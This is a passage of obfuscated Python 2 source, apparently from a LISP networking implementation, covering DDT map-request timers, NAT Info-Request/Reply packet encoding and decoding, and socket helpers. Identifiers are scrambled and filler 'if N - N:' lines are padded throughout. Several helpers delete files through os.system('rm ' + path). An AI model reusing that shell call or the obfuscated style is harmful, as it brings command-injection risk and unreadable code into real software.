green ( self . eid . print_address ( ) , False ) , self . nonce ) )
if 5 - 5: II111iiii * iII111i - o0oOOo0O0Ooo + I1IiiI % iIii1I11I1II1
if 97 - 97: o0oOOo0O0Ooo % OoooooooOO . I1IiiI + iIii1I11I1II1
def queue_map_request ( self ) :
self . retransmit_timer = threading . Timer ( LISP_DDT_MAP_REQUEST_INTERVAL ,
lisp_retransmit_ddt_map_request , [ self ] )
self . retransmit_timer . start ( )
lisp_ddt_map_requestQ [ str ( self . nonce ) ] = self
if 81 - 81: OoO0O00 * ooOoO0o
if 98 - 98: OoOoOO00 % ooOoO0o * I1ii11iIi11i
def dequeue_map_request ( self ) :
self . retransmit_timer . cancel ( )
if ( lisp_ddt_map_requestQ . has_key ( str ( self . nonce ) ) ) :
lisp_ddt_map_requestQ . pop ( str ( self . nonce ) )
if 64 - 64: OOooOOo + I11i . ooOoO0o
if 17 - 17: OoOoOO00 . I1Ii111
if 10 - 10: I1ii11iIi11i * I1Ii111 * Ii1I * o0oOOo0O0Ooo - o0oOOo0O0Ooo + OoOoOO00
def print_eid_tuple ( self ) :
return ( lisp_print_eid_tuple ( self . eid , self . group ) )
if 92 - 92: Ii1I / iII111i . I1ii11iIi11i % Ii1I
if 18 - 18: OOooOOo + I1IiiI + i1IIi + o0oOOo0O0Ooo % o0oOOo0O0Ooo
if 48 - 48: O0
if 5 - 5: OOooOOo / i11iIiiIii . I11i % OOooOOo
if 1 - 1: II111iiii + O0 * OoOoOO00 / IiII . O0
if 87 - 87: IiII + I1IiiI
if 74 - 74: OoO0O00 + OoO0O00 % iII111i / I11i / O0
if 54 - 54: o0oOOo0O0Ooo / OoooooooOO * ooOoO0o . OoOoOO00 - I1Ii111
if 69 - 69: oO0o - OoO0O00
if 80 - 80: ooOoO0o + iIii1I11I1II1 . II111iiii + I1IiiI - oO0o % OoOoOO00
if 10 - 10: iIii1I11I1II1
if 44 - 44: OoOoOO00 * oO0o . I1ii11iIi11i + i11iIiiIii
if 85 - 85: I11i
if 36 - 36: ooOoO0o % OoO0O00
if 1 - 1: OoooooooOO - OoOoOO00
if 35 - 35: I1Ii111
if 35 - 35: Oo0Ooo - iIii1I11I1II1 / i1IIi + OoO0O00 - OoooooooOO / i11iIiiIii
if 79 - 79: I1IiiI * ooOoO0o * ooOoO0o
if 92 - 92: iII111i % I1ii11iIi11i
if 16 - 16: oO0o
LISP_DDT_ACTION_SITE_NOT_FOUND = - 2
LISP_DDT_ACTION_NULL = - 1
LISP_DDT_ACTION_NODE_REFERRAL = 0
LISP_DDT_ACTION_MS_REFERRAL = 1
LISP_DDT_ACTION_MS_ACK = 2
LISP_DDT_ACTION_MS_NOT_REG = 3
LISP_DDT_ACTION_DELEGATION_HOLE = 4
LISP_DDT_ACTION_NOT_AUTH = 5
LISP_DDT_ACTION_MAX = LISP_DDT_ACTION_NOT_AUTH
if 52 - 52: OoooooooOO % ooOoO0o - I1Ii111 * I11i
lisp_map_referral_action_string = [
"node-referral" , "ms-referral" , "ms-ack" , "ms-not-registered" ,
"delegation-hole" , "not-authoritative" ]
if 24 - 24: Ii1I + IiII + OoooooooOO / oO0o / I1IiiI + IiII
if 52 - 52: ooOoO0o
if 38 - 38: OoO0O00 + I1IiiI % IiII
if 87 - 87: oO0o * Ii1I - I1Ii111 / oO0o
if 65 - 65: OoOoOO00
if 87 - 87: I11i - i11iIiiIii - OOooOOo . OoOoOO00 + IiII . OoO0O00
if 70 - 70: iIii1I11I1II1 % OoooooooOO / OoO0O00 . O0 - I11i % II111iiii
if 84 - 84: OOooOOo * i1IIi . iIii1I11I1II1 * iII111i + I1Ii111 + II111iiii
if 97 - 97: Ii1I - IiII
if 64 - 64: oO0o . ooOoO0o / ooOoO0o - II111iiii
if 81 - 81: I1ii11iIi11i
if 64 - 64: oO0o * OoO0O00 / OOooOOo + Ii1I % Oo0Ooo . IiII
if 2 - 2: I1Ii111 + I11i
if 47 - 47: i11iIiiIii + iIii1I11I1II1 % I1ii11iIi11i - oO0o % OoO0O00
if 85 - 85: oO0o * OoOoOO00 / OoOoOO00
if 85 - 85: OOooOOo / I1Ii111 . i1IIi / OoOoOO00 + iIii1I11I1II1
if 71 - 71: OoO0O00
if 96 - 96: I1ii11iIi11i / I1IiiI - I1ii11iIi11i / II111iiii - IiII
if 74 - 74: Ii1I * OoooooooOO % OOooOOo + OoooooooOO + iII111i
if 83 - 83: i1IIi
if 2 - 2: i1IIi / OOooOOo * O0
if 99 - 99: OoooooooOO . OoOoOO00 / II111iiii
if 64 - 64: iII111i / i1IIi . I1IiiI + O0
if 5 - 5: O0 . i11iIiiIii
if 71 - 71: o0oOOo0O0Ooo + iII111i + ooOoO0o
if 27 - 27: OoooooooOO . iII111i * I1Ii111 % O0 + OoooooooOO - iII111i
if 86 - 86: i1IIi
if 81 - 81: OoOoOO00
if 52 - 52: iII111i * IiII % I1IiiI * I11i
if 73 - 73: I1Ii111 * ooOoO0o
if 62 - 62: OOooOOo . I1IiiI * iIii1I11I1II1 + OoO0O00 * ooOoO0o / oO0o
if 14 - 14: iII111i / OoO0O00
if 75 - 75: IiII
if 68 - 68: IiII - i1IIi % IiII . OoO0O00 . i11iIiiIii . OoooooooOO
if 32 - 32: iII111i + OoO0O00 % IiII + I1IiiI
if 69 - 69: I1Ii111 + I11i - iIii1I11I1II1 - II111iiii . Ii1I
if 74 - 74: I1ii11iIi11i % o0oOOo0O0Ooo + O0 - i11iIiiIii - IiII % OOooOOo
if 39 - 39: OoO0O00 - o0oOOo0O0Ooo
if 71 - 71: iII111i . OoO0O00 + ooOoO0o - OOooOOo - Oo0Ooo
if 100 - 100: OoooooooOO - o0oOOo0O0Ooo + I1Ii111 . OoooooooOO % i11iIiiIii
if 64 - 64: I1Ii111 % OoooooooOO / i1IIi / OoO0O00
if 2 - 2: I11i % o0oOOo0O0Ooo . OoO0O00 . OoO0O00
if 89 - 89: ooOoO0o - oO0o + II111iiii + OoO0O00 - IiII
if 27 - 27: I1Ii111 - o0oOOo0O0Ooo + OoO0O00
if 38 - 38: OoOoOO00 + OoO0O00 . i11iIiiIii + Ii1I % i1IIi % I1IiiI
if 93 - 93: i11iIiiIii
if 63 - 63: iIii1I11I1II1 - iIii1I11I1II1 % o0oOOo0O0Ooo
if 97 - 97: i1IIi % I11i % OoOoOO00
if 25 - 25: OoOoOO00 . iIii1I11I1II1 - iII111i % II111iiii . OoOoOO00
if 16 - 16: OOooOOo . Oo0Ooo . I1IiiI % O0 . I1ii11iIi11i + i11iIiiIii
if 100 - 100: I1ii11iIi11i - i1IIi - OoO0O00 * o0oOOo0O0Ooo + OoOoOO00
if 31 - 31: i1IIi
if 21 - 21: o0oOOo0O0Ooo / O0 % O0 . OoooooooOO / I1IiiI
if 94 - 94: ooOoO0o + OoO0O00 / ooOoO0o - ooOoO0o + Oo0Ooo + o0oOOo0O0Ooo
if 50 - 50: oO0o . Oo0Ooo
if 15 - 15: Ii1I
if 64 - 64: OoooooooOO
if 25 - 25: IiII
if 29 - 29: OoOoOO00 % ooOoO0o * OoooooooOO
class lisp_info ( ) :
def __init__ ( self ) :
self . info_reply = False
self . nonce = 0
self . private_etr_rloc = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . global_etr_rloc = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . global_ms_rloc = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . ms_port = 0
self . etr_port = 0
self . rtr_list = [ ]
self . hostname = lisp_hostname
if 8 - 8: i11iIiiIii - I1Ii111 / IiII
if 17 - 17: i11iIiiIii * OoO0O00 . o0oOOo0O0Ooo . OoooooooOO . OoOoOO00 - I1ii11iIi11i
def print_info ( self ) :
if ( self . info_reply ) :
oOOoooOoO = "Info-Reply"
I1IIiIIIii = ( ", ms-port: {}, etr-port: {}, global-rloc: {}, " + "ms-rloc: {}, private-rloc: {}, RTR-list: " ) . format ( self . ms_port , self . etr_port ,
# I1IiiI * iIii1I11I1II1 . II111iiii % II111iiii - o0oOOo0O0Ooo
# i1IIi % OoOoOO00 + I1IiiI
red ( self . global_etr_rloc . print_address_no_iid ( ) , False ) ,
red ( self . global_ms_rloc . print_address_no_iid ( ) , False ) ,
red ( self . private_etr_rloc . print_address_no_iid ( ) , False ) )
if ( len ( self . rtr_list ) == 0 ) : I1IIiIIIii += "empty, "
for I11ii1I111Ii in self . rtr_list :
I1IIiIIIii += red ( I11ii1I111Ii . print_address_no_iid ( ) , False ) + ", "
if 58 - 58: O0
I1IIiIIIii = I1IIiIIIii [ 0 : - 2 ]
else :
oOOoooOoO = "Info-Request"
I1I1111I11I = "<none>" if self . hostname == None else self . hostname
I1IIiIIIii = ", hostname: {}" . format ( blue ( I1I1111I11I , False ) )
if 66 - 66: I11i * I1ii11iIi11i + II111iiii % ooOoO0o
lprint ( "{} -> nonce: 0x{}{}" . format ( bold ( oOOoooOoO , False ) ,
lisp_hex_string ( self . nonce ) , I1IIiIIIii ) )
if 23 - 23: O0
if 76 - 76: IiII . oO0o * I1Ii111 / I1IiiI
def encode ( self ) :
iII = ( LISP_NAT_INFO << 28 )
if ( self . info_reply ) : iII |= ( 1 << 27 )
if 9 - 9: oO0o . I1ii11iIi11i + I1IiiI . Oo0Ooo . i11iIiiIii
if 75 - 75: I1Ii111 % II111iiii + OoOoOO00 % i11iIiiIii / iIii1I11I1II1
if 81 - 81: II111iiii * I1Ii111 + OoooooooOO
if 33 - 33: Ii1I - II111iiii + IiII / II111iiii * I1ii11iIi11i - I1Ii111
if 53 - 53: I1Ii111
if 25 - 25: i1IIi
if 75 - 75: OoooooooOO / ooOoO0o - iII111i . OoooooooOO . OoOoOO00 % i1IIi
IiiiIi1iiii11 = struct . pack ( "I" , socket . htonl ( iII ) )
IiiiIi1iiii11 += struct . pack ( "Q" , self . nonce )
IiiiIi1iiii11 += struct . pack ( "III" , 0 , 0 , 0 )
if 7 - 7: OoOoOO00 . i1IIi * i11iIiiIii % i11iIiiIii
if 54 - 54: OoO0O00 / I1IiiI . Oo0Ooo
if 39 - 39: OoO0O00 . ooOoO0o
if 41 - 41: Oo0Ooo * I1ii11iIi11i - II111iiii - II111iiii
if ( self . info_reply == False ) :
if ( self . hostname == None ) :
IiiiIi1iiii11 += struct . pack ( "H" , 0 )
else :
IiiiIi1iiii11 += struct . pack ( "H" , socket . htons ( LISP_AFI_NAME ) )
IiiiIi1iiii11 += self . hostname + "\0"
if 7 - 7: oO0o
return ( IiiiIi1iiii11 )
if 41 - 41: ooOoO0o
if 93 - 93: Ii1I + I1Ii111 + Ii1I
if 23 - 23: I1IiiI - i1IIi / ooOoO0o
if 4 - 4: IiII . I1ii11iIi11i + iII111i % ooOoO0o
if 28 - 28: I1Ii111
O0ooo0 = socket . htons ( LISP_AFI_LCAF )
iI1IIiI111iII = LISP_LCAF_NAT_TYPE
oOOO0O000Oo = socket . htons ( 16 )
i1IIIiiIiII1I = socket . htons ( self . ms_port )
oO000O000o0Oo = socket . htons ( self . etr_port )
IiiiIi1iiii11 += struct . pack ( "HHBBHHHH" , O0ooo0 , 0 , iI1IIiI111iII , 0 , oOOO0O000Oo ,
i1IIIiiIiII1I , oO000O000o0Oo , socket . htons ( self . global_etr_rloc . afi ) )
IiiiIi1iiii11 += self . global_etr_rloc . pack_address ( )
IiiiIi1iiii11 += struct . pack ( "HH" , 0 , socket . htons ( self . private_etr_rloc . afi ) )
IiiiIi1iiii11 += self . private_etr_rloc . pack_address ( )
if ( len ( self . rtr_list ) == 0 ) : IiiiIi1iiii11 += struct . pack ( "H" , 0 )
if 63 - 63: Oo0Ooo / I11i . iII111i + ooOoO0o / I1ii11iIi11i / I1IiiI
if 43 - 43: OoOoOO00 / I1Ii111 % I11i / I1IiiI - IiII - ooOoO0o
if 25 - 25: OOooOOo * OoOoOO00 + I11i . ooOoO0o
if 96 - 96: iIii1I11I1II1 / Ii1I
for I11ii1I111Ii in self . rtr_list :
IiiiIi1iiii11 += struct . pack ( "H" , socket . htons ( I11ii1I111Ii . afi ) )
IiiiIi1iiii11 += I11ii1I111Ii . pack_address ( )
if 92 - 92: OoO0O00 * I1ii11iIi11i + iIii1I11I1II1
return ( IiiiIi1iiii11 )
if 88 - 88: iIii1I11I1II1 + iIii1I11I1II1 * i11iIiiIii . I1ii11iIi11i % oO0o
if 94 - 94: I1IiiI / I1ii11iIi11i / OOooOOo
def decode ( self , packet ) :
OoO = packet
i1I1iii1I11II = "I"
Iiiii = struct . calcsize ( i1I1iii1I11II )
if ( len ( packet ) < Iiiii ) : return ( None )
if 45 - 45: II111iiii
iII = struct . unpack ( i1I1iii1I11II , packet [ : Iiiii ] )
iII = iII [ 0 ]
packet = packet [ Iiiii : : ]
if 98 - 98: i11iIiiIii + I1ii11iIi11i * OOooOOo / OoOoOO00
i1I1iii1I11II = "Q"
Iiiii = struct . calcsize ( i1I1iii1I11II )
if ( len ( packet ) < Iiiii ) : return ( None )
if 84 - 84: o0oOOo0O0Ooo
Iii11I = struct . unpack ( i1I1iii1I11II , packet [ : Iiiii ] )
if 40 - 40: OoooooooOO - oO0o / O0 * I1Ii111 . O0 + i11iIiiIii
iII = socket . ntohl ( iII )
self . nonce = Iii11I [ 0 ]
self . info_reply = iII & 0x08000000
self . hostname = None
packet = packet [ Iiiii : : ]
if 9 - 9: OOooOOo % O0 % O0 / I1ii11iIi11i . II111iiii / II111iiii
if 78 - 78: iIii1I11I1II1 - i1IIi . I11i . o0oOOo0O0Ooo
if 66 - 66: OOooOOo * Oo0Ooo
if 58 - 58: OOooOOo
if 96 - 96: IiII % OoooooooOO + O0 * II111iiii / OOooOOo . I1Ii111
i1I1iii1I11II = "HH"
Iiiii = struct . calcsize ( i1I1iii1I11II )
if ( len ( packet ) < Iiiii ) : return ( None )
if 47 - 47: OoO0O00 - Oo0Ooo * OoO0O00 / oO0o
if 13 - 13: ooOoO0o
if 55 - 55: i1IIi . I11i . II111iiii + O0 + ooOoO0o - i1IIi
if 3 - 3: iIii1I11I1II1 / oO0o
if 61 - 61: I1Ii111 / O0 - iII111i
I1I1I1 , II111iiI1Ii1 = struct . unpack ( i1I1iii1I11II , packet [ : Iiiii ] )
if ( II111iiI1Ii1 != 0 ) : return ( None )
if 44 - 44: i1IIi
packet = packet [ Iiiii : : ]
i1I1iii1I11II = "IBBH"
Iiiii = struct . calcsize ( i1I1iii1I11II )
if ( len ( packet ) < Iiiii ) : return ( None )
if 23 - 23: I1ii11iIi11i . OoooooooOO / Ii1I + o0oOOo0O0Ooo
oOoooOOO0o0 , i1o00Oo , OOoOOO , I1iiiI1i = struct . unpack ( i1I1iii1I11II ,
packet [ : Iiiii ] )
if 69 - 69: iII111i * I11i
if ( I1iiiI1i != 0 ) : return ( None )
packet = packet [ Iiiii : : ]
if 43 - 43: o0oOOo0O0Ooo - IiII * Ii1I . i11iIiiIii / II111iiii
if 61 - 61: OoOoOO00 / I1IiiI . I1ii11iIi11i % OOooOOo
if 70 - 70: OOooOOo * OoOoOO00 / oO0o + Oo0Ooo / O0
if 16 - 16: Oo0Ooo / OoooooooOO / IiII + Oo0Ooo * i11iIiiIii
if ( self . info_reply == False ) :
i1I1iii1I11II = "H"
Iiiii = struct . calcsize ( i1I1iii1I11II )
if ( len ( packet ) >= Iiiii ) :
O0ooo0 = struct . unpack ( i1I1iii1I11II , packet [ : Iiiii ] ) [ 0 ]
if ( socket . ntohs ( O0ooo0 ) == LISP_AFI_NAME ) :
packet = packet [ Iiiii : : ]
packet , self . hostname = lisp_decode_dist_name ( packet )
if 15 - 15: o0oOOo0O0Ooo / i11iIiiIii
if 63 - 63: I1ii11iIi11i - Ii1I + I11i
return ( OoO )
if 98 - 98: iII111i / IiII * I1IiiI / oO0o - iIii1I11I1II1
if 72 - 72: O0 . OOooOOo
if 99 - 99: i1IIi + iIii1I11I1II1 - ooOoO0o + OoO0O00 + Oo0Ooo . I1ii11iIi11i
if 74 - 74: i1IIi
if 80 - 80: ooOoO0o + I1Ii111 . I1ii11iIi11i % OoooooooOO
i1I1iii1I11II = "HHBBHHH"
Iiiii = struct . calcsize ( i1I1iii1I11II )
if ( len ( packet ) < Iiiii ) : return ( None )
if 26 - 26: OoOoOO00 . iII111i * iIii1I11I1II1 / IiII
O0ooo0 , O0O , iI1IIiI111iII , i1o00Oo , oOOO0O000Oo , i1IIIiiIiII1I , oO000O000o0Oo = struct . unpack ( i1I1iii1I11II , packet [ : Iiiii ] )
if 69 - 69: OoooooooOO / I11i + Ii1I * II111iiii
if 35 - 35: i11iIiiIii + oO0o
if ( socket . ntohs ( O0ooo0 ) != LISP_AFI_LCAF ) : return ( None )
if 85 - 85: OoOoOO00 . O0 % OoooooooOO % oO0o
self . ms_port = socket . ntohs ( i1IIIiiIiII1I )
self . etr_port = socket . ntohs ( oO000O000o0Oo )
packet = packet [ Iiiii : : ]
if 43 - 43: I1IiiI - I11i . I1IiiI / i11iIiiIii % IiII * i11iIiiIii
if 12 - 12: II111iiii - iIii1I11I1II1
if 43 - 43: i11iIiiIii % OoO0O00
if 100 - 100: i1IIi
i1I1iii1I11II = "H"
Iiiii = struct . calcsize ( i1I1iii1I11II )
if ( len ( packet ) < Iiiii ) : return ( None )
if 4 - 4: i11iIiiIii - OOooOOo * IiII % OoooooooOO - OoOoOO00
if 81 - 81: Ii1I * ooOoO0o . oO0o . IiII
if 71 - 71: IiII + OoO0O00
if 39 - 39: I1IiiI % IiII / II111iiii / II111iiii
O0ooo0 = struct . unpack ( i1I1iii1I11II , packet [ : Iiiii ] ) [ 0 ]
packet = packet [ Iiiii : : ]
if ( O0ooo0 != 0 ) :
self . global_etr_rloc . afi = socket . ntohs ( O0ooo0 )
packet = self . global_etr_rloc . unpack_address ( packet )
if ( packet == None ) : return ( None )
self . global_etr_rloc . mask_len = self . global_etr_rloc . host_mask_len ( )
if 95 - 95: II111iiii + i11iIiiIii + o0oOOo0O0Ooo
if 30 - 30: O0 - O0 % iIii1I11I1II1 + iII111i * OoooooooOO
if 1 - 1: O0
if 36 - 36: oO0o . iII111i
if 62 - 62: I11i + iIii1I11I1II1 % I11i * OOooOOo + iIii1I11I1II1 % Ii1I
if 56 - 56: o0oOOo0O0Ooo
if ( len ( packet ) < Iiiii ) : return ( OoO )
if 55 - 55: oO0o - I1Ii111 / ooOoO0o % I1IiiI * OoooooooOO * I1IiiI
O0ooo0 = struct . unpack ( i1I1iii1I11II , packet [ : Iiiii ] ) [ 0 ]
packet = packet [ Iiiii : : ]
if ( O0ooo0 != 0 ) :
self . global_ms_rloc . afi = socket . ntohs ( O0ooo0 )
packet = self . global_ms_rloc . unpack_address ( packet )
if ( packet == None ) : return ( OoO )
self . global_ms_rloc . mask_len = self . global_ms_rloc . host_mask_len ( )
if 88 - 88: Ii1I + O0
if 92 - 92: I1IiiI % iII111i % I11i + OoooooooOO - i11iIiiIii
if 9 - 9: i11iIiiIii - II111iiii / ooOoO0o
if 81 - 81: i11iIiiIii % OoOoOO00 % OoO0O00 * Ii1I
if 85 - 85: OoooooooOO * ooOoO0o
if ( len ( packet ) < Iiiii ) : return ( OoO )
if 23 - 23: OOooOOo / I11i / OoooooooOO - Ii1I / OoO0O00 - OoO0O00
O0ooo0 = struct . unpack ( i1I1iii1I11II , packet [ : Iiiii ] ) [ 0 ]
packet = packet [ Iiiii : : ]
if ( O0ooo0 != 0 ) :
self . private_etr_rloc . afi = socket . ntohs ( O0ooo0 )
packet = self . private_etr_rloc . unpack_address ( packet )
if ( packet == None ) : return ( OoO )
self . private_etr_rloc . mask_len = self . private_etr_rloc . host_mask_len ( )
if 60 - 60: OOooOOo . ooOoO0o % i1IIi % Ii1I % ooOoO0o + OoO0O00
if 26 - 26: O0 % o0oOOo0O0Ooo + iII111i * I1ii11iIi11i * I1Ii111
if 4 - 4: OOooOOo * OoooooooOO * i1IIi % I1ii11iIi11i % Oo0Ooo
if 1 - 1: OoO0O00 / iIii1I11I1II1 % I1ii11iIi11i - o0oOOo0O0Ooo
if 62 - 62: I1Ii111 % II111iiii
if 91 - 91: I11i % Ii1I - IiII + iIii1I11I1II1 * iIii1I11I1II1
while ( len ( packet ) >= Iiiii ) :
O0ooo0 = struct . unpack ( i1I1iii1I11II , packet [ : Iiiii ] ) [ 0 ]
packet = packet [ Iiiii : : ]
if ( O0ooo0 == 0 ) : continue
I11ii1I111Ii = lisp_address ( socket . ntohs ( O0ooo0 ) , "" , 0 , 0 )
packet = I11ii1I111Ii . unpack_address ( packet )
if ( packet == None ) : return ( OoO )
I11ii1I111Ii . mask_len = I11ii1I111Ii . host_mask_len ( )
self . rtr_list . append ( I11ii1I111Ii )
if 91 - 91: i11iIiiIii + Ii1I
return ( OoO )
if 85 - 85: I11i % IiII
if 68 - 68: Oo0Ooo . I1Ii111 - o0oOOo0O0Ooo * iIii1I11I1II1 - II111iiii % i1IIi
if 58 - 58: I11i / i11iIiiIii * i11iIiiIii
class lisp_nat_info ( ) :
def __init__ ( self , addr_str , hostname , port ) :
self . address = addr_str
self . hostname = hostname
self . port = port
self . uptime = lisp_get_timestamp ( )
if 24 - 24: ooOoO0o - I1Ii111 * II111iiii - II111iiii
if 47 - 47: IiII - iIii1I11I1II1 / OoOoOO00 * iII111i - iIii1I11I1II1 % oO0o
def timed_out ( self ) :
oO000o0Oo00 = time . time ( ) - self . uptime
return ( oO000o0Oo00 >= ( LISP_INFO_INTERVAL * 2 ) )
if 93 - 93: Ii1I / iII111i
if 100 - 100: Oo0Ooo
if 94 - 94: I1ii11iIi11i / i1IIi * I1IiiI - I11i - I1ii11iIi11i
class lisp_info_source ( ) :
def __init__ ( self , hostname , addr_str , port ) :
self . address = lisp_address ( LISP_AFI_IPV4 , addr_str , 32 , 0 )
self . port = port
self . uptime = lisp_get_timestamp ( )
self . nonce = None
self . hostname = hostname
self . no_timeout = False
if 6 - 6: I1ii11iIi11i % o0oOOo0O0Ooo + o0oOOo0O0Ooo / OOooOOo / I1IiiI
if 67 - 67: OoOoOO00 . iII111i / OOooOOo * ooOoO0o + i1IIi
def cache_address_for_info_source ( self ) :
Oo000O000 = self . address . print_address_no_iid ( ) + self . hostname
lisp_info_sources_by_address [ Oo000O000 ] = self
if 100 - 100: OOooOOo . ooOoO0o + I1Ii111 . oO0o
if 20 - 20: i11iIiiIii - i1IIi - iIii1I11I1II1 - OoooooooOO
def cache_nonce_for_info_source ( self , nonce ) :
self . nonce = nonce
lisp_info_sources_by_nonce [ nonce ] = self
if 72 - 72: I1Ii111 . OoO0O00
if 59 - 59: I1IiiI * I11i % i1IIi
if 77 - 77: OOooOOo * OoooooooOO + I1IiiI + I1IiiI % oO0o . OoooooooOO
if 60 - 60: iIii1I11I1II1
if 13 - 13: II111iiii + Ii1I
if 33 - 33: i1IIi
if 36 - 36: ooOoO0o % ooOoO0o . i11iIiiIii
if 42 - 42: OoO0O00 . I1Ii111 / Ii1I
if 57 - 57: iIii1I11I1II1 % I1ii11iIi11i . OOooOOo / oO0o . OoOoOO00
if 74 - 74: I1IiiI * OoO0O00 + OoooooooOO * ooOoO0o . oO0o
if 66 - 66: II111iiii + OOooOOo + i11iIiiIii / II111iiii
def lisp_concat_auth_data ( alg_id , auth1 , auth2 , auth3 , auth4 ) :
if 37 - 37: I1IiiI + OoO0O00 . OoO0O00 % OoOoOO00 + o0oOOo0O0Ooo
if ( lisp_is_x86 ( ) ) :
if ( auth1 != "" ) : auth1 = byte_swap_64 ( auth1 )
if ( auth2 != "" ) : auth2 = byte_swap_64 ( auth2 )
if ( auth3 != "" ) :
if ( alg_id == LISP_SHA_1_96_ALG_ID ) : auth3 = socket . ntohl ( auth3 )
else : auth3 = byte_swap_64 ( auth3 )
if 81 - 81: i1IIi % iIii1I11I1II1
if ( auth4 != "" ) : auth4 = byte_swap_64 ( auth4 )
if 41 - 41: oO0o - iII111i / o0oOOo0O0Ooo . iII111i % Oo0Ooo + OOooOOo
if 82 - 82: ooOoO0o
if ( alg_id == LISP_SHA_1_96_ALG_ID ) :
auth1 = lisp_hex_string ( auth1 )
auth1 = auth1 . zfill ( 16 )
auth2 = lisp_hex_string ( auth2 )
auth2 = auth2 . zfill ( 16 )
auth3 = lisp_hex_string ( auth3 )
auth3 = auth3 . zfill ( 8 )
oooO = auth1 + auth2 + auth3
if 89 - 89: OOooOOo / I1ii11iIi11i . I1IiiI + i11iIiiIii
if ( alg_id == LISP_SHA_256_128_ALG_ID ) :
auth1 = lisp_hex_string ( auth1 )
auth1 = auth1 . zfill ( 16 )
auth2 = lisp_hex_string ( auth2 )
auth2 = auth2 . zfill ( 16 )
auth3 = lisp_hex_string ( auth3 )
auth3 = auth3 . zfill ( 16 )
auth4 = lisp_hex_string ( auth4 )
auth4 = auth4 . zfill ( 16 )
oooO = auth1 + auth2 + auth3 + auth4
if 11 - 11: oO0o . i11iIiiIii * ooOoO0o % OoooooooOO % O0
return ( oooO )
if 59 - 59: i11iIiiIii / OoO0O00
if 48 - 48: iIii1I11I1II1
if 19 - 19: oO0o
if 69 - 69: I1ii11iIi11i % iII111i - OoooooooOO % Ii1I * oO0o
if 12 - 12: OoOoOO00 / I1Ii111 . O0 . IiII - OOooOOo - OoO0O00
if 28 - 28: II111iiii . OoOoOO00 - o0oOOo0O0Ooo
if 89 - 89: I1Ii111 * OoooooooOO . OOooOOo . I11i % i11iIiiIii
if 8 - 8: I1ii11iIi11i + II111iiii . OoO0O00 + I1IiiI - II111iiii % OoO0O00
if 85 - 85: i11iIiiIii % iII111i + II111iiii
if 16 - 16: ooOoO0o * OoOoOO00 / OoOoOO00 + II111iiii
def lisp_open_listen_socket ( local_addr , port ) :
if ( port . isdigit ( ) ) :
if ( local_addr . find ( "." ) != - 1 ) :
II11i = socket . socket ( socket . AF_INET , socket . SOCK_DGRAM )
if 32 - 32: O0 % iIii1I11I1II1 + oO0o
if ( local_addr . find ( ":" ) != - 1 ) :
if ( lisp_is_raspbian ( ) ) : return ( None )
II11i = socket . socket ( socket . AF_INET6 , socket . SOCK_DGRAM )
if 51 - 51: o0oOOo0O0Ooo * o0oOOo0O0Ooo . Ii1I
II11i . bind ( ( local_addr , int ( port ) ) )
else :
IiIIO0 = port
if ( os . path . exists ( IiIIO0 ) ) :
os . system ( "rm " + IiIIO0 )
time . sleep ( 1 )
if 14 - 14: OoO0O00 . I11i % II111iiii % i11iIiiIii + OoooooooOO
II11i = socket . socket ( socket . AF_UNIX , socket . SOCK_DGRAM )
II11i . bind ( IiIIO0 )
if 50 - 50: i11iIiiIii * I11i + i11iIiiIii - i1IIi
return ( II11i )
if 69 - 69: I1IiiI + IiII + oO0o * I1ii11iIi11i . iIii1I11I1II1 / OoooooooOO
if 77 - 77: Oo0Ooo - ooOoO0o
if 68 - 68: Ii1I * O0
if 61 - 61: II111iiii - OoO0O00 . iIii1I11I1II1 * o0oOOo0O0Ooo . OoO0O00 % IiII
if 11 - 11: oO0o + I11i
if 6 - 6: i1IIi . o0oOOo0O0Ooo + OoO0O00 + OOooOOo + oO0o
if 30 - 30: O0
def lisp_open_send_socket ( internal_name , afi ) :
if ( internal_name == "" ) :
if ( afi == LISP_AFI_IPV4 ) :
II11i = socket . socket ( socket . AF_INET , socket . SOCK_DGRAM )
if 98 - 98: I1Ii111
if ( afi == LISP_AFI_IPV6 ) :
if ( lisp_is_raspbian ( ) ) : return ( None )
II11i = socket . socket ( socket . AF_INET6 , socket . SOCK_DGRAM )
if 58 - 58: OOooOOo
else :
if ( os . path . exists ( internal_name ) ) : os . system ( "rm " + internal_name )
II11i = socket . socket ( socket . AF_UNIX , socket . SOCK_DGRAM )
II11i . bind ( internal_name )
if 6 - 6: I1ii11iIi11i
return ( II11i )
if 37 - 37: i11iIiiIii . II111iiii + OOooOOo + i1IIi * OOooOOo
if 18 - 18: ooOoO0o
if 18 - 18: I1Ii111 + OoOoOO00 % OOooOOo - IiII - i1IIi + I1ii11iIi11i
if 33 - 33: I11i * Ii1I / Oo0Ooo + oO0o % OOooOOo % OoooooooOO
if 29 - 29: Ii1I . II111iiii / I1Ii111
if 79 - 79: IiII . OoOoOO00 / oO0o % OoO0O00 / Ii1I + I11i
if 78 - 78: o0oOOo0O0Ooo + I1Ii111 % i11iIiiIii % I1IiiI - Ii1I
def lisp_close_socket ( sock , internal_name ) :
sock . close ( )
if ( os . path . exists ( internal_name ) ) : os . system ( "rm " + internal_name )
return
if 81 - 81: i11iIiiIii - II111iiii + I11i
if 52 - 52: II111iiii
if 62 - 62: iII111i / OoO0O00 + i11iIiiIii / Oo0Ooo
if 26 - 26: I1ii11iIi11i - OoO0O00
if 19 - 19: iIii1I11I1II1 / I1ii11iIi11i + O0
if 12 - 12: I11i . OOooOOo + o0oOOo0O0Ooo . OoO0O00 + o0oOOo0O0Ooo
if 56 - 56: i1IIi / i1IIi . OoO0O00 % i1IIi - OoOoOO00 % OOooOOo
if 66 - 66: i11iIiiIii * IiII % IiII . I1IiiI / ooOoO0o
def lisp_is_running ( node ) :
return ( True if ( os . path . exists ( node ) ) else False )
if 50 - 50: IiII . iII111i / o0oOOo0O0Ooo % OoOoOO00 * IiII % I11i
if 15 - 15: Ii1I
if 29 - 29: I11i / I1IiiI / OoooooooOO . OoOoOO00 / I11i . I1Ii111
if 69 - 69: O0 * OoOoOO00 + o0oOOo0O0Ooo + I1IiiI % iII111i . OoooooooOO
if 45 - 45: I1Ii111 + oO0o - o0oOOo0O0Ooo - OoOoOO00 + I1IiiI / II111iiii
if 46 - 46: II111iiii . iIii1I11I1II1
if 62 - 62: I1ii11iIi11i % i1IIi % I1Ii111 * ooOoO0o % OOooOOo + I1IiiI
if 100 - 100: II111iiii - o0oOOo0O0Ooo * OoooooooOO . ooOoO0o / II111iiii / oO0o
